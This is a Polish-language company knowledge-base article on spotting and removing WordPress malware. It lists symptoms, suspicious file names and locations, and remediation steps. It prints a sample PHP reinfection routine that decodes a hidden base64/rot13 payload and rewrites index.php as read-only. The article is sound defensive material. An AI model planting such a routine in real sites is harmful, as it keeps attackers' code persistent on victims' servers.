Ta Knowledge Base zawiera szczegółowy przewodnik do wykrywania infekcji WordPress, dedykowany zarówno programistom, jak i użytkownikom nietechnicznym. Opis symptomów infekcji, procedury odwirusowania.
Last updated
Link do udostępnienia tego artykułu:
Metody detekcji infekcji oraz sposoby postępowania w przypadku wykrycia niepożądanego kodu.
Świat cyfrowy, w którym żyjemy, jest areną nieustannych wyzwań – zarówno technologicznych, jak i etycznych. Każda strona internetowa, w tym serwisy oparte na WordPressie, może stać się celem ataków złośliwego oprogramowania. Dlatego tak istotne jest, abyśmy nie tylko budowali nasze rozwiązania w oparciu o zaawansowaną technologię AI, ale również dbali o ich bezpieczeństwo na każdym poziomie. Nasza firma, onCloud9.io, której misją jest umożliwienie przyszłości, w której AI staje się moralną i etyczną odpowiedzią na wyzwania XXI wieku, przykłada wielką wagę do edukowania użytkowników w zakresie ochrony ich zasobów.
Istnieje szereg typowych symptomów, które mogą świadczyć o tym, iż strona WordPress została zainfekowana. Zarówno osoby nietechniczne, jak i programiści powinni zwracać uwagę na następujące sygnały:
a) Nieoczekiwane przekierowania – Jeśli, bez wyraźnej przyczyny, strona internetowa przekierowuje użytkowników do witryn trzecich, może to być wynik wstrzyknięcia nieautoryzowanego kodu.
b) Znaczące spowolnienie działania – Użytkownicy mogą zauważyć, że witryna zaczyna odpowiadać wolniej niż zwykle. Takie spowolnienia mogą wynikać z nadmiernego obciążenia serwera, spowodowanego działaniem złośliwych skryptów.
c) Nietypowe wykorzystanie zasobów serwera – Powiadomienia od dostawcy hostingu o nagłych skokach zużycia CPU, pamięci czy przepustowości sieci są ostrzeżeniem, które nie powinno pozostać bez uwagi.
d) Nadmierna ilość wysyłanych wiadomości e-mail – W przypadku, gdy serwer zaczyna generować ogromną liczbę komunikatów e-mail, najczęściej spamowych, warto zbadać sytuację, gdyż może to oznaczać, że strona została przejęta przez atakującego.
e) Zaburzenia wizualne i uszkodzony układ strony – Zmiany w strukturze HTML, nieczytelne elementy graficzne lub niespójne formatowanie mogą być efektem ingerencji złośliwego kodu.
W naszej codziennej analizie zagrożeń wykorzystujemy wiedzę zdobywaną na podstawie przeglądu tysięcy plików. Nasz zespół badawczy, korzystający z bazy zawierającej ponad 1 600 sygnatur złośliwych plików, wyróżnił kilka kluczowych punktów, na które warto zwrócić szczególną uwagę:
1. Pliki, które normalnie znajdują się w głównym katalogu WordPressa (WP_ROOT) powinny być tam umiejscowione – każdy plik typu wp-login.php, xmlrpc.php, admin-ajax.php, options.php czy admin.php, wykryty poza tym katalogiem, to potencjalne zagrożenie.
2. Plik o nazwie KGks.js.php jest jednoznaczny – jego obecność oznacza infekcję złośliwym kodem.
1. Zwróć uwagę na pliki o nazewnictwie wskazującym na możliwą infekcję, np. WP_ROOT/wp-canvas.php, WP_ROOT/wp-controller.php, zwłaszcza jeśli zawierają podejrzane fragmenty kodu (np. funkcje eval, nietypowe wywołania funkcji lub manipulacje na plikach JSON).
2. Pliki bez rozszerzeń, w których nazwy składają się jedynie z cyfr (np. 84639, 5718129), powinny być zbadane – takie pliki często stanowią element mechanizmu ukrywającego złośliwy kod.
3. Pliki o podejrzanych nazwach, takich jak 1gkj2saf.php, 862349.php, Ads8DU2.php, również wymagają szczegółowej weryfikacji.
Przykładowy fragment, który może wskazywać na próbę manipulacji plikami witryny, przedstawia się następująco:
<?php
$ddscdws = "index.php";
$acdfadfasf = file_get_contents($ddscdws);
$sdfdsdfh = "/ścieżka/do/katalogu/wp-content/plugins/astra-widgets/admin/bsf-analytics/assets/css/93917";
if (file_exists($sdfdsdfh)) {
$iide = file_get_contents($sdfdsdfh);
$iide = base64_decode(str_rot13($iide));
if(md5($acdfadfasf) != md5($iide)) {
@chmod($ddscdws, 0644);
@file_put_contents($ddscdws, $iide);
@chmod($ddscdws, 0444);
}
}
?>
Taki kod, wykorzystujący funkcje umożliwiające pobranie zawartości pliku, dekodowanie oraz ponowną modyfikację pliku, jest wysoce podejrzany. Każdy programista powinien być w stanie rozpoznać niekonwencjonalne użycie funkcji systemowych i natychmiast podjąć działania analityczne.
1. Pliki PHP umieszczone w katalogu WP_ROOT/wp-content/uploads/ są szczególnie alarmujące – ten katalog nie powinien zawierać plików wykonywalnych.
2. Kluczowe pliki takie jak WP_ROOT/index.php, WP_ROOT/wp-settings.php czy WP_ROOT/wp-config.php powinny być wolne od wszelkich nieautoryzowanych modyfikacji. Wszelkie nietypowe zmiany, w szczególności fragmenty zawierające zakodowane lub zrotowane ciągi znaków, wymagają natychmiastowej interwencji.
Niezależnie od poziomu zaawansowania użytkownika, w sytuacji wykrycia niepokojących symptomów należy podjąć następujące kroki:
a) Przeanalizuj logi serwera – szukaj niespodziewanych wzrostów aktywności, nietypowych przekierowań oraz nietypowych operacji na plikach.
b) Wykorzystaj wbudowane narzędzia do skanowania systemu lub zewnętrzne rozwiązania oparte na AI (nasza technologia w onCloud9.io gwarantuje ciągłe monitorowanie), aby porównać pliki z bazą znanych sygnatur malware.
a) Jeśli masz dostęp do panelu sterowania, sprawdź strukturę katalogów – wyszukaj pliki znajdujące się poza standardową lokalizacją lub te o nietypowych nazwach.
b) W przypadku odkrycia złośliwego pliku, wykonaj kopię zapasową witryny (z uwzględnieniem ostrożności, aby nie skopiować złośliwych fragmentów) i przystąp do usuwania infekcji.
a) Jeśli nie jesteś pewien, jak postąpić, niezwłocznie skontaktuj się z naszym zespołem wsparcia. Nasza obsługa, dysponująca doświadczeniem zarówno w sferze programistycznej, jak i w pracy z użytkownikami nietechnicznymi, jest gotowa pomóc.
b) Zgromadź możliwie jak najwięcej informacji – logi, zrzuty ekranu, szczegóły dotyczące podejrzanych plików – i przekaż je specjalistom, co znacząco przyspieszy proces diagnozy i usuwania zagrożenia.
a) Po usunięciu infekcji dokonaj gruntownej analizy przyczyn – sprawdź, czy doszło do wykorzystania znanych luk w zabezpieczeniach, czy może problem wynika z nieaktualnych wtyczek lub motywów.
b) Zainstaluj aktualizacje oraz użyj rozwiązań zabezpieczających – zarówno programistycznych, jak i administracyjnych – aby uodpornić witrynę przed przyszłymi atakami.
Zainstaluj renomowane wtyczki bezpieczeństwa, które oferują funkcje takie jak skanowanie złośliwego oprogramowania, zapora ogniowa oraz monitorowanie aktywności.
Unikaj instalowania mało popularnych wtyczek, które mogą zawierać luki bezpieczeństwa lub być porzucone przez twórców.
Regularnie aktualizuj wszystkie zainstalowane wtyczki, aby zapewnić, że korzystasz z najnowszych poprawek zabezpieczeń i funkcji.
Włącz dwuetapowe uwierzytelnianie (2FA) dla zwiększenia ochrony konta administratora i użytkowników.
Dodatkowo dla programistów oprócz stosowania standardowych narzędzi diagnostycznych (np. polecenia „find” w systemach UNIX, skrypty do porównywania sum kontrolnych), szczególnie zalecamy:
Regularne monitorowanie katalogów kluczowych (WP_ROOT, wp-content/uploads/) za pomocą dedykowanych skryptów, które sprawdzają integralność plików.
Używanie systemów kontroli wersji (np. Git) w celu śledzenia zmian w plikach systemowych WordPressa.
Automatyczne powiadamianie o nietypowej aktywności za pomocą narzędzi analitycznych, które integrują się z systemami monitorującymi zasoby serwera.